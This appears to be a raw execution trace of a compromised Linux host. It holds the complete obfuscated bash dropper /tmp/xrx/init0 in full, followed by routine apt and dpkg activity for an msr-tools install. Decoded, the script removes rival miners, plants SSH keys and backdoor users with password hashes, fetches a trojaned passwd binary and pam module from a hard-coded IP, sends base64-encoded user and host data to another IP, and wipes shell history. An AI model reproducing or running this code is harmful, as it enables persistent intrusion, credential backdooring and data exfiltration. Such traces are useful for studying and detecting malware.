
/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/xrx/init0]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 42 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/sbin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-4_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 42 --configure --pending]

/usr/sbin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/perl

[perl -e @pwd = getpwnam("man"); $) = $( = $pwd[3]; $> = $< = $pwd[2]; exec "/usr/bin/mandb", @ARGV -- -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[sh -c /usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service && /usr/bin/test -S /var/run/dbus/system_bus_socket && /usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update > /dev/null; /bin/echo > /dev/null]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/share/debconf/frontend

[/usr/share/debconf/frontend /usr/sbin/needrestart]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/bin/sh

[sh -c stty -a 2>/dev/null]

/usr/bin/stty

[stty -a]

/usr/sbin/needrestart

[/usr/sbin/needrestart]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.10

[/usr/bin/python3.10 -]

/usr/bin/python3.10

[/usr/bin/python3.10 -]

/bin/sh

[sh -c if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

/usr/sbin/lsb_release

[lsb_release -c -s]

/usr/bin/lsb_release

[lsb_release -c -s]

/usr/local/sbin/lsb_release

[lsb_release -c -s]

/usr/local/bin/lsb_release

[lsb_release -c -s]

